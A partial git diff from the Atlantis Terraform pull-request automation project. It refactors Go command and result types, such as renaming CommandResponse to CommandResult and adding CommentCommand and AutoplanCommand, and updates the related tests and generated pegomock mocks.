@@ -283,20 +344,20 @@ func TestNewCommand_CleansDir(t *testing.T) {
 
 	for _, c := range cases {
 		t.Run(c.Dir, func(t *testing.T) {
-			cmd := events.NewCommand(c.Dir, nil, events.Plan, false, "workspace", "", false)
+			cmd := events.NewCommand(c.Dir, nil, events.Plan, false, "workspace", "")
 			Equals(t, c.ExpDir, cmd.Dir)
 		})
 	}
 }
 
 func TestNewCommand_EmptyWorkspace(t *testing.T) {
-	cmd := events.NewCommand("dir", nil, events.Plan, false, "", "", false)
+	cmd := events.NewCommand("dir", nil, events.Plan, false, "", "")
 	Equals(t, "default", cmd.Workspace)
 }
 
 func TestNewCommand_AllFieldsSet(t *testing.T) {
-	cmd := events.NewCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace", "project", false)
-	Equals(t, events.Command{
+	cmd := events.NewCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace", "project")
+	Equals(t, events.CommentCommand{
 		Workspace:   "workspace",
 		Dir:         "dir",
 		Verbose:     true,
@@ -306,6 +367,52 @@ func TestNewCommand_AllFieldsSet(t *testing.T) {
 	}, *cmd)
 }
 
+func TestAutoplanCommand_CommandName(t *testing.T) {
+	Equals(t, events.Plan, (events.AutoplanCommand{}).CommandName())
+}
+
+func TestAutoplanCommand_IsVerbose(t *testing.T) {
+	Equals(t, false, (events.AutoplanCommand{}).IsVerbose())
+}
+
+func TestAutoplanCommand_IsAutoplan(t *testing.T) {
+	Equals(t, true, (events.AutoplanCommand{}).IsAutoplan())
+}
+
+func TestCommentCommand_CommandName(t *testing.T) {
+	Equals(t, events.Plan, (events.CommentCommand{
+		Name: events.Plan,
+	}).CommandName())
+	Equals(t, events.Apply, (events.CommentCommand{
+		Name: events.Apply,
+	}).CommandName())
+}
+
+func TestCommentCommand_IsVerbose(t *testing.T) {
+	Equals(t, false, (events.CommentCommand{
+		Verbose: false,
+	}).IsVerbose())
+	Equals(t, true, (events.CommentCommand{
+		Verbose: true,
+	}).IsVerbose())
+}
+
+func TestCommentCommand_IsAutoplan(t *testing.T) {
+	Equals(t, false, (events.CommentCommand{}).IsAutoplan())
+}
+
+func TestCommentCommand_String(t *testing.T) {
+	exp := `command="plan" verbose=true dir="mydir" workspace="myworkspace" project="myproject" flags="flag1,flag2"`
+	Equals(t, exp, (events.CommentCommand{
+		Dir:         "mydir",
+		Flags:       []string{"flag1", "flag2"},
+		Name:        events.Plan,
+		Verbose:     true,
+		Workspace:   "myworkspace",
+		ProjectName: "myproject",
+	}).String())
+}
+
 var mergeEventJSON = `{
   "object_kind": "merge_request",
   "user": {
diff --git a/server/events/executor.go b/server/events/executor.go
index 10df87a764..b308e9d02c 100644
--- a/server/events/executor.go
+++ b/server/events/executor.go
@@ -18,5 +18,5 @@ package events
 // Executor is the generic interface implemented by each command type:
 // help, plan, and apply.
 type Executor interface {
-	Execute(ctx *CommandContext) CommandResponse
+	Execute(ctx *CommandContext) CommandResult
 }
diff --git a/server/events/markdown_renderer.go b/server/events/markdown_renderer.go
index acb0d86791..eb06c4ead7 100644
--- a/server/events/markdown_renderer.go
+++ b/server/events/markdown_renderer.go
@@ -58,7 +58,7 @@ type ProjectResultTmplData struct {
 
 // Render formats the data into a markdown string.
 // nolint: interfacer
-func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log string, verbose bool, autoplan bool) string {
+func (m *MarkdownRenderer) Render(res CommandResult, cmdName CommandName, log string, verbose bool, autoplan bool) string {
 	commandStr := strings.Title(cmdName.String())
 	common := CommonData{commandStr, verbose, log}
 	if res.Error != nil {
@@ -73,10 +73,10 @@ func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log
 	return m.renderProjectResults(res.ProjectResults, common)
 }
 
-func (m *MarkdownRenderer) renderProjectResults(pathResults []ProjectResult, common CommonData) string {
+func (m *MarkdownRenderer) renderProjectResults(results []ProjectResult, common CommonData) string {
 	var resultsTmplData []ProjectResultTmplData
 
-	for _, result := range pathResults {
+	for _, result := range results {
 		resultData := ProjectResultTmplData{
 			Workspace: result.Workspace,
 			Dir:       result.Path,
diff --git a/server/events/markdown_renderer_test.go b/server/events/markdown_renderer_test.go
index 202097e9be..040c47731e 100644
--- a/server/events/markdown_renderer_test.go
+++ b/server/events/markdown_renderer_test.go
@@ -45,18 +45,20 @@ func TestRenderErr(t *testing.T) {
 
 	r := events.MarkdownRenderer{}
 	for _, c := range cases {
-		res := events.CommandResponse{
-			Error: c.Error,
-		}
-		for _, verbose := range []bool{true, false} {
-			t.Log("testing " + c.Description)
-			s := r.Render(res, c.Command, "log", verbose, false)
-			if !verbose {
-				Equals(t, c.Expected, s)
-			} else {
-				Equals(t, c.Expected+"<details><summary>Log</summary>\n  <p>\n\n```\nlog```\n</p></details>\n", s)
+		t.Run(c.Description, func(t *testing.T) {
+			res := events.CommandResult{
+				Error: c.Error,
 			}
-		}
+			for _, verbose := range []bool{true, false} {
+				t.Log("testing " + c.Description)
+				s := r.Render(res, c.Command, "log", verbose, false)
+				if !verbose {
+					Equals(t, c.Expected, s)
+				} else {
+					Equals(t, c.Expected+"<details><summary>Log</summary>\n  <p>\n\n```\nlog```\n</p></details>\n", s)
+				}
+			}
+		})
 	}
 }
 
@@ -83,25 +85,27 @@ func TestRenderFailure(t *testing.T) {
 
 	r := events.MarkdownRenderer{}
 	for _, c := range cases {
-		res := events.CommandResponse{
-			Failure: c.Failure,
-		}
-		for _, verbose := range []bool{true, false} {
-			t.Log("testing " + c.Description)
-			s := r.Render(res, c.Command, "log", verbose, false)
-			if !verbose {
-				Equals(t, c.Expected, s)
-			} else {
-				Equals(t, c.Expected+"<details><summary>Log</summary>\n  <p>\n\n```\nlog```\n</p></details>\n", s)
+		t.Run(c.Description, func(t *testing.T) {
+			res := events.CommandResult{
+				Failure: c.Failure,
+			}
+			for _, verbose := range []bool{true, false} {
+				t.Log("testing " + c.Description)
+				s := r.Render(res, c.Command, "log", verbose, false)
+				if !verbose {
+					Equals(t, c.Expected, s)
+				} else {
+					Equals(t, c.Expected+"<details><summary>Log</summary>\n  <p>\n\n```\nlog```\n</p></details>\n", s)
+				}
 			}
-		}
+		})
 	}
 }
 
 func TestRenderErrAndFailure(t *testing.T) {
 	t.Log("if there is an error and a failure, the error should be printed")
 	r := events.MarkdownRenderer{}
-	res := events.CommandResponse{
+	res := events.CommandResult{
 		Error:   errors.New("error"),
 		Failure: "failure",
 	}
@@ -109,6 +113,15 @@ func TestRenderErrAndFailure(t *testing.T) {
 	Equals(t, "**Plan Error**\n```\nerror\n```\n\n", s)
 }
 
+func TestRenderAutoplanNoResults(t *testing.T) {
+	// If there are no project results during an autoplan we should still comment
+	// back because the user might expect some output.
+	r := events.MarkdownRenderer{}
+	res := events.CommandResult{}
+	s := r.Render(res, events.Plan, "", false, true)
+	Equals(t, "Ran `plan` in 0 projects because Atlantis detected no Terraform changes or could not determine where to run `plan`.\n\n", s)
+}
+
 func TestRenderProjectResults(t *testing.T) {
 	cases := []struct {
 		Description    string
@@ -121,9 +134,11 @@ func TestRenderProjectResults(t *testing.T) {
 			events.Plan,
 			[]events.ProjectResult{
 				{
-					PlanSuccess: &events.PlanSuccess{
-						TerraformOutput: "terraform-output",
-						LockURL:         "lock-url",
+					ProjectCommandResult: events.ProjectCommandResult{
+						PlanSuccess: &events.PlanSuccess{
+							TerraformOutput: "terraform-output",
+							LockURL:         "lock-url",
+						},
 					},
 					Workspace: "workspace",
 					Path:      "path",
@@ -136,9 +151,11 @@ func TestRenderProjectResults(t *testing.T) {
 			events.Apply,
 			[]events.ProjectResult{
 				{
-					ApplySuccess: "success",
-					Workspace:    "workspace",
-					Path:         "path",
+					ProjectCommandResult: events.ProjectCommandResult{
+						ApplySuccess: "success",
+					},
+					Workspace: "workspace",
+					Path:      "path",
 				},
 			},
 			"Ran Apply in dir: `path` workspace: `workspace`\n```diff\nsuccess\n```\n\n",
@@ -150,17 +167,21 @@ func TestRenderProjectResults(t *testing.T) {
 				{
 					Workspace: "workspace",
 					Path:      "path",
-					PlanSuccess: &events.PlanSuccess{
-						TerraformOutput: "terraform-output",
-						LockURL:         "lock-url",
+					ProjectCommandResult: events.ProjectCommandResult{
+						PlanSuccess: &events.PlanSuccess{
+							TerraformOutput: "terraform-output",
+							LockURL:         "lock-url",
+						},
 					},
 				},
 				{
 					Workspace: "workspace",
 					Path:      "path2",
-					PlanSuccess: &events.PlanSuccess{
-						TerraformOutput: "terraform-output2",
-						LockURL:         "lock-url2",
+					ProjectCommandResult: events.ProjectCommandResult{
+						PlanSuccess: &events.PlanSuccess{
+							TerraformOutput: "terraform-output2",
+							LockURL:         "lock-url2",
+						},
 					},
 				},
 			},
@@ -171,14 +192,18 @@ func TestRenderProjectResults(t *testing.T) {
 			events.Apply,
 			[]events.ProjectResult{
 				{
-					Path:         "path",
-					Workspace:    "workspace",
-					ApplySuccess: "success",
+					Path:      "path",
+					Workspace: "workspace",
+					ProjectCommandResult: events.ProjectCommandResult{
+						ApplySuccess: "success",
+					},
 				},
 				{
-					Path:         "path2",
-					Workspace:    "workspace",
-					ApplySuccess: "success2",
+					Path:      "path2",
+					Workspace: "workspace",
+					ProjectCommandResult: events.ProjectCommandResult{
+						ApplySuccess: "success2",
+					},
 				},
 			},
 			"Ran Apply for 2 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nsuccess\n```\n---\n### 2. workspace: `workspace` path: `path2`\n```diff\nsuccess2\n```\n---\n\n",
@@ -188,7 +213,9 @@ func TestRenderProjectResults(t *testing.T) {
 			events.Plan,
 			[]events.ProjectResult{
 				{
-					Error:     errors.New("error"),
+					ProjectCommandResult: events.ProjectCommandResult{
+						Error: errors.New("error"),
+					},
 					Path:      "path",
 					Workspace: "workspace",
 				},
@@ -202,7 +229,9 @@ func TestRenderProjectResults(t *testing.T) {
 				{
 					Path:      "path",
 					Workspace: "workspace",
-					Failure:   "failure",
+					ProjectCommandResult: events.ProjectCommandResult{
+						Failure: "failure",
+					},
 				},
 			},
 			"Ran Plan in dir: `path` workspace: `workspace`\n**Plan Failed**: failure\n\n\n",
@@ -214,20 +243,26 @@ func TestRenderProjectResults(t *testing.T) {
 				{
 					Workspace: "workspace",
 					Path:      "path",
-					PlanSuccess: &events.PlanSuccess{
-						TerraformOutput: "terraform-output",
-						LockURL:         "lock-url",
+					ProjectCommandResult: events.ProjectCommandResult{
+						PlanSuccess: &events.PlanSuccess{
+							TerraformOutput: "terraform-output",
+							LockURL:         "lock-url",
+						},
 					},
 				},
 				{
 					Workspace: "workspace",
 					Path:      "path2",
-					Failure:   "failure",
+					ProjectCommandResult: events.ProjectCommandResult{
+						Failure: "failure",
+					},
 				},
 				{
 					Workspace: "workspace",
 					Path:      "path3",
-					Error:     errors.New("error"),
+					ProjectCommandResult: events.ProjectCommandResult{
+						Error: errors.New("error"),
+					},
 				},
 			},
 			"Ran Plan for 3 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n1. workspace: `workspace` path: `path3`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n### 2. workspace: `workspace` path: `path2`\n**Plan Failed**: failure\n\n---\n### 3. workspace: `workspace` path: `path3`\n**Plan Error**\n```\nerror\n```\n\n---\n\n",
@@ -237,19 +272,25 @@ func TestRenderProjectResults(t *testing.T) {
 			events.Apply,
 			[]events.ProjectResult{
 				{
-					Workspace:    "workspace",
-					Path:         "path",
-					ApplySuccess: "success",
+					Workspace: "workspace",
+					Path:      "path",
+					ProjectCommandResult: events.ProjectCommandResult{
+						ApplySuccess: "success",
+					},
 				},
 				{
 					Workspace: "workspace",
 					Path:      "path2",
-					Failure:   "failure",
+					ProjectCommandResult: events.ProjectCommandResult{
+						Failure: "failure",
+					},
 				},
 				{
 					Workspace: "workspace",
 					Path:      "path3",
-					Error:     errors.New("error"),
+					ProjectCommandResult: events.ProjectCommandResult{
+						Error: errors.New("error"),
+					},
 				},
 			},
 			"Ran Apply for 3 projects:\n1. workspace: `workspace` path: `path`\n1. workspace: `workspace` path: `path2`\n1. workspace: `workspace` path: `path3`\n\n### 1. workspace: `workspace` path: `path`\n```diff\nsuccess\n```\n---\n### 2. workspace: `workspace` path: `path2`\n**Apply Failed**: failure\n\n---\n### 3. workspace: `workspace` path: `path3`\n**Apply Error**\n```\nerror\n```\n\n---\n\n",
@@ -258,18 +299,20 @@ func TestRenderProjectResults(t *testing.T) {
 
 	r := events.MarkdownRenderer{}
 	for _, c := range cases {
-		res := events.CommandResponse{
-			ProjectResults: c.ProjectResults,
-		}
-		for _, verbose := range []bool{true, false} {
-			t.Run(c.Description, func(t *testing.T) {
-				s := r.Render(res, c.Command, "log", verbose, false)
-				if !verbose {
-					Equals(t, c.Expected, s)
-				} else {
-					Equals(t, c.Expected+"<details><summary>Log</summary>\n  <p>\n\n```\nlog```\n</p></details>\n", s)
-				}
-			})
-		}
+		t.Run(c.Description, func(t *testing.T) {
+			res := events.CommandResult{
+				ProjectResults: c.ProjectResults,
+			}
+			for _, verbose := range []bool{true, false} {
+				t.Run(c.Description, func(t *testing.T) {
+					s := r.Render(res, c.Command, "log", verbose, false)
+					if !verbose {
+						Equals(t, c.Expected, s)
+					} else {
+						Equals(t, c.Expected+"<details><summary>Log</summary>\n  <p>\n\n```\nlog```\n</p></details>\n", s)
+					}
+				})
+			}
+		})
 	}
 }
diff --git a/server/events/mocks/matchers/events_commandresponse.go b/server/events/mocks/matchers/events_commandname.go
similarity index 53%
rename from server/events/mocks/matchers/events_commandresponse.go
rename to server/events/mocks/matchers/events_commandname.go
index f596b2c4db..448c937abc 100644
--- a/server/events/mocks/matchers/events_commandresponse.go
+++ b/server/events/mocks/matchers/events_commandname.go
@@ -7,14 +7,14 @@ import (
 	events "github.com/runatlantis/atlantis/server/events"
 )
 
-func AnyEventsCommandResponse() events.CommandResponse {
-	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.CommandResponse))(nil)).Elem()))
-	var nullValue events.CommandResponse
+func AnyEventsCommandName() events.CommandName {
+	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.CommandName))(nil)).Elem()))
+	var nullValue events.CommandName
 	return nullValue
 }
 
-func EqEventsCommandResponse(value events.CommandResponse) events.CommandResponse {
+func EqEventsCommandName(value events.CommandName) events.CommandName {
 	pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
-	var nullValue events.CommandResponse
+	var nullValue events.CommandName
 	return nullValue
 }
diff --git a/server/events/mocks/matchers/events_commandresult.go b/server/events/mocks/matchers/events_commandresult.go
new file mode 100644
index 0000000000..54269ef123
--- /dev/null
+++ b/server/events/mocks/matchers/events_commandresult.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+	"reflect"
+
+	"github.com/petergtz/pegomock"
+	events "github.com/runatlantis/atlantis/server/events"
+)
+
+func AnyEventsCommandResult() events.CommandResult {
+	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.CommandResult))(nil)).Elem()))
+	var nullValue events.CommandResult
+	return nullValue
+}
+
+func EqEventsCommandResult(value events.CommandResult) events.CommandResult {
+	pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+	var nullValue events.CommandResult
+	return nullValue
+}
diff --git a/server/events/mocks/matchers/models_projectcommandcontext.go b/server/events/mocks/matchers/models_projectcommandcontext.go
new file mode 100644
index 0000000000..3f76b9a225
--- /dev/null
+++ b/server/events/mocks/matchers/models_projectcommandcontext.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+	"reflect"
+
+	"github.com/petergtz/pegomock"
+	models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+func AnyModelsProjectCommandContext() models.ProjectCommandContext {
+	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(models.ProjectCommandContext))(nil)).Elem()))
+	var nullValue models.ProjectCommandContext
+	return nullValue
+}
+
+func EqModelsProjectCommandContext(value models.ProjectCommandContext) models.ProjectCommandContext {
+	pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+	var nullValue models.ProjectCommandContext
+	return nullValue
+}
diff --git a/server/events/mocks/matchers/ptr_to_events_command.go b/server/events/mocks/matchers/ptr_to_events_command.go
index 91edd3b663..771aacf306 100644
--- a/server/events/mocks/matchers/ptr_to_events_command.go
+++ b/server/events/mocks/matchers/ptr_to_events_command.go
@@ -7,14 +7,14 @@ import (
 	events "github.com/runatlantis/atlantis/server/events"
 )
 
-func AnyPtrToEventsCommand() *events.Command {
-	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*events.Command))(nil)).Elem()))
-	var nullValue *events.Command
+func AnyPtrToEventsCommand() *events.CommentCommand {
+	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*events.CommentCommand))(nil)).Elem()))
+	var nullValue *events.CommentCommand
 	return nullValue
 }
 
-func EqPtrToEventsCommand(value *events.Command) *events.Command {
+func EqPtrToEventsCommand(value *events.CommentCommand) *events.CommentCommand {
 	pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
-	var nullValue *events.Command
+	var nullValue *events.CommentCommand
 	return nullValue
 }
diff --git a/server/events/mocks/matchers/ptr_to_events_commentcommand.go b/server/events/mocks/matchers/ptr_to_events_commentcommand.go
new file mode 100644
index 0000000000..fbbbfcc15c
--- /dev/null
+++ b/server/events/mocks/matchers/ptr_to_events_commentcommand.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+	"reflect"
+
+	"github.com/petergtz/pegomock"
+	events "github.com/runatlantis/atlantis/server/events"
+)
+
+func AnyPtrToEventsCommentCommand() *events.CommentCommand {
+	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*events.CommentCommand))(nil)).Elem()))
+	var nullValue *events.CommentCommand
+	return nullValue
+}
+
+func EqPtrToEventsCommentCommand(value *events.CommentCommand) *events.CommentCommand {
+	pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+	var nullValue *events.CommentCommand
+	return nullValue
+}
diff --git a/server/events/mocks/matchers/ptr_to_github_pullrequestevent.go b/server/events/mocks/matchers/ptr_to_github_pullrequestevent.go
new file mode 100644
index 0000000000..1952cf1f74
--- /dev/null
+++ b/server/events/mocks/matchers/ptr_to_github_pullrequestevent.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+	"reflect"
+
+	github "github.com/google/go-github/github"
+	"github.com/petergtz/pegomock"
+)
+
+func AnyPtrToGithubPullRequestEvent() *github.PullRequestEvent {
+	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*github.PullRequestEvent))(nil)).Elem()))
+	var nullValue *github.PullRequestEvent
+	return nullValue
+}
+
+func EqPtrToGithubPullRequestEvent(value *github.PullRequestEvent) *github.PullRequestEvent {
+	pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+	var nullValue *github.PullRequestEvent
+	return nullValue
+}
diff --git a/server/events/mocks/matchers/ptr_to_models_repo.go b/server/events/mocks/matchers/ptr_to_models_repo.go
new file mode 100644
index 0000000000..05ba1aef35
--- /dev/null
+++ b/server/events/mocks/matchers/ptr_to_models_repo.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+	"reflect"
+
+	"github.com/petergtz/pegomock"
+	models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+func AnyPtrToModelsRepo() *models.Repo {
+	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*models.Repo))(nil)).Elem()))
+	var nullValue *models.Repo
+	return nullValue
+}
+
+func EqPtrToModelsRepo(value *models.Repo) *models.Repo {
+	pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+	var nullValue *models.Repo
+	return nullValue
+}
diff --git a/server/events/mocks/matchers/slice_of_models_projectcommandcontext.go b/server/events/mocks/matchers/slice_of_models_projectcommandcontext.go
new file mode 100644
index 0000000000..08974c59cd
--- /dev/null
+++ b/server/events/mocks/matchers/slice_of_models_projectcommandcontext.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+	"reflect"
+
+	"github.com/petergtz/pegomock"
+	models "github.com/runatlantis/atlantis/server/events/models"
+)
+
+func AnySliceOfModelsProjectCommandContext() []models.ProjectCommandContext {
+	pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*([]models.ProjectCommandContext))(nil)).Elem()))
+	var nullValue []models.ProjectCommandContext
+	return nullValue
+}
+
+func EqSliceOfModelsProjectCommandContext(value []models.ProjectCommandContext) []models.ProjectCommandContext {
+	pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+	var nullValue []models.ProjectCommandContext
+	return nullValue
+}
diff --git a/server/events/mocks/mock_command_runner.go b/server/events/mocks/mock_command_runner.go
index 481fcf72f5..8ef3387c0d 100644
--- a/server/events/mocks/mock_command_runner.go
+++ b/server/events/mocks/mock_command_runner.go
@@ -19,9 +19,14 @@ func NewMockCommandRunner() *MockCommandRunner {
 	return &MockCommandRunner{fail: pegomock.GlobalFailHandler}
 }
 
-func (mock *MockCommandRunner) ExecuteCommand(baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, cmd *events.Command) {
-	params := []pegomock.Param{baseRepo, headRepo, user, pullNum, cmd}
-	pegomock.GetGenericMockFrom(mock).Invoke("ExecuteCommand", params, []reflect.Type{})
+func (mock *MockCommandRunner) RunCommentCommand(baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, cmd *events.CommentCommand) {
+	params := []pegomock.Param{baseRepo, maybeHeadRepo, user, pullNum, cmd}
+	pegomock.GetGenericMockFrom(mock).Invoke("RunCommentCommand", params, []reflect.Type{})
+}
+
+func (mock *MockCommandRunner) RunAutoplanCommand(baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User) {
+	params := []pegomock.Param{baseRepo, headRepo, pull, user}
+	pegomock.GetGenericMockFrom(mock).Invoke("RunAutoplanCommand", params, []reflect.Type{})
 }
 
 func (mock *MockCommandRunner) VerifyWasCalledOnce() *VerifierCommandRunner {
@@ -42,32 +47,32 @@ type VerifierCommandRunner struct {
 	inOrderContext         *pegomock.InOrderContext
 }
 
-func (verifier *VerifierCommandRunner) ExecuteCommand(baseRepo models.Repo, headRepo models.Repo, user models.User, pullNum int, cmd *events.Command) *CommandRunner_ExecuteCommand_OngoingVerification {
-	params := []pegomock.Param{baseRepo, headRepo, user, pullNum, cmd}
-	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "ExecuteCommand", params)
-	return &CommandRunner_ExecuteCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+func (verifier *VerifierCommandRunner) RunCommentCommand(baseRepo models.Repo, maybeHeadRepo *models.Repo, user models.User, pullNum int, cmd *events.CommentCommand) *CommandRunner_RunCommentCommand_OngoingVerification {
+	params := []pegomock.Param{baseRepo, maybeHeadRepo, user, pullNum, cmd}
+	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "RunCommentCommand", params)
+	return &CommandRunner_RunCommentCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
 }
 
-type CommandRunner_ExecuteCommand_OngoingVerification struct {
+type CommandRunner_RunCommentCommand_OngoingVerification struct {
 	mock              *MockCommandRunner
 	methodInvocations []pegomock.MethodInvocation
 }
 
-func (c *CommandRunner_ExecuteCommand_OngoingVerification) GetCapturedArguments() (models.Repo, models.Repo, models.User, int, *events.Command) {
-	baseRepo, headRepo, user, pullNum, cmd := c.GetAllCapturedArguments()
-	return baseRepo[len(baseRepo)-1], headRepo[len(headRepo)-1], user[len(user)-1], pullNum[len(pullNum)-1], cmd[len(cmd)-1]
+func (c *CommandRunner_RunCommentCommand_OngoingVerification) GetCapturedArguments() (models.Repo, *models.Repo, models.User, int, *events.CommentCommand) {
+	baseRepo, maybeHeadRepo, user, pullNum, cmd := c.GetAllCapturedArguments()
+	return baseRepo[len(baseRepo)-1], maybeHeadRepo[len(maybeHeadRepo)-1], user[len(user)-1], pullNum[len(pullNum)-1], cmd[len(cmd)-1]
 }
 
-func (c *CommandRunner_ExecuteCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.Repo, _param2 []models.User, _param3 []int, _param4 []*events.Command) {
+func (c *CommandRunner_RunCommentCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []*models.Repo, _param2 []models.User, _param3 []int, _param4 []*events.CommentCommand) {
 	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
 	if len(params) > 0 {
 		_param0 = make([]models.Repo, len(params[0]))
 		for u, param := range params[0] {
 			_param0[u] = param.(models.Repo)
 		}
-		_param1 = make([]models.Repo, len(params[1]))
+		_param1 = make([]*models.Repo, len(params[1]))
 		for u, param := range params[1] {
-			_param1[u] = param.(models.Repo)
+			_param1[u] = param.(*models.Repo)
 		}
 		_param2 = make([]models.User, len(params[2]))
 		for u, param := range params[2] {
@@ -77,9 +82,48 @@ func (c *CommandRunner_ExecuteCommand_OngoingVerification) GetAllCapturedArgumen
 		for u, param := range params[3] {
 			_param3[u] = param.(int)
 		}
-		_param4 = make([]*events.Command, len(params[4]))
+		_param4 = make([]*events.CommentCommand, len(params[4]))
 		for u, param := range params[4] {
-			_param4[u] = param.(*events.Command)
+			_param4[u] = param.(*events.CommentCommand)
+		}
+	}
+	return
+}
+
+func (verifier *VerifierCommandRunner) RunAutoplanCommand(baseRepo models.Repo, headRepo models.Repo, pull models.PullRequest, user models.User) *CommandRunner_RunAutoplanCommand_OngoingVerification {
+	params := []pegomock.Param{baseRepo, headRepo, pull, user}
+	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "RunAutoplanCommand", params)
+	return &CommandRunner_RunAutoplanCommand_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type CommandRunner_RunAutoplanCommand_OngoingVerification struct {
+	mock              *MockCommandRunner
+	methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *CommandRunner_RunAutoplanCommand_OngoingVerification) GetCapturedArguments() (models.Repo, models.Repo, models.PullRequest, models.User) {
+	baseRepo, headRepo, pull, user := c.GetAllCapturedArguments()
+	return baseRepo[len(baseRepo)-1], headRepo[len(headRepo)-1], pull[len(pull)-1], user[len(user)-1]
+}
+
+func (c *CommandRunner_RunAutoplanCommand_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.Repo, _param2 []models.PullRequest, _param3 []models.User) {
+	params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+	if len(params) > 0 {
+		_param0 = make([]models.Repo, len(params[0]))
+		for u, param := range params[0] {
+			_param0[u] = param.(models.Repo)
+		}
+		_param1 = make([]models.Repo, len(params[1]))
+		for u, param := range params[1] {
+			_param1[u] = param.(models.Repo)
+		}
+		_param2 = make([]models.PullRequest, len(params[2]))
+		for u, param := range params[2] {
+			_param2[u] = param.(models.PullRequest)
+		}
+		_param3 = make([]models.User, len(params[3]))
+		for u, param := range params[3] {
+			_param3[u] = param.(models.User)
 		}
 	}
 	return
diff --git a/server/events/mocks/mock_commit_status_updater.go b/server/events/mocks/mock_commit_status_updater.go
index 3ed9e933b4..e5815d4144 100644
--- a/server/events/mocks/mock_commit_status_updater.go
+++ b/server/events/mocks/mock_commit_status_updater.go
@@ -20,8 +20,8 @@ func NewMockCommitStatusUpdater() *MockCommitStatusUpdater {
 	return &MockCommitStatusUpdater{fail: pegomock.GlobalFailHandler}
 }
 
-func (mock *MockCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, cmd *events.Command) error {
-	params := []pegomock.Param{repo, pull, status, cmd}
+func (mock *MockCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, command events.CommandName) error {
+	params := []pegomock.Param{repo, pull, status, command}
 	result := pegomock.GetGenericMockFrom(mock).Invoke("Update", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()})
 	var ret0 error
 	if len(result) != 0 {
@@ -32,8 +32,8 @@ func (mock *MockCommitStatusUpdater) Update(repo models.Repo, pull models.PullRe
 	return ret0
 }
 
-func (mock *MockCommitStatusUpdater) UpdateProjectResult(ctx *events.CommandContext, res events.CommandResponse) error {
-	params := []pegomock.Param{ctx, res}
+func (mock *MockCommitStatusUpdater) UpdateProjectResult(ctx *events.CommandContext, commandName events.CommandName, res events.CommandResult) error {
+	params := []pegomock.Param{ctx, commandName, res}
 	result := pegomock.GetGenericMockFrom(mock).Invoke("UpdateProjectResult", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()})
 	var ret0 error
 	if len(result) != 0 {
@@ -62,8 +62,8 @@ type VerifierCommitStatusUpdater struct {
 	inOrderContext         *pegomock.InOrderContext
 }
 
-func (verifier *VerifierCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, cmd *events.Command) *CommitStatusUpdater_Update_OngoingVerification {
-	params := []pegomock.Param{repo, pull, status, cmd}
+func (verifier *VerifierCommitStatusUpdater) Update(repo models.Repo, pull models.PullRequest, status vcs.CommitStatus, command events.CommandName) *CommitStatusUpdater_Update_OngoingVerification {
+	params := []pegomock.Param{repo, pull, status, command}
 	methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Update", params)
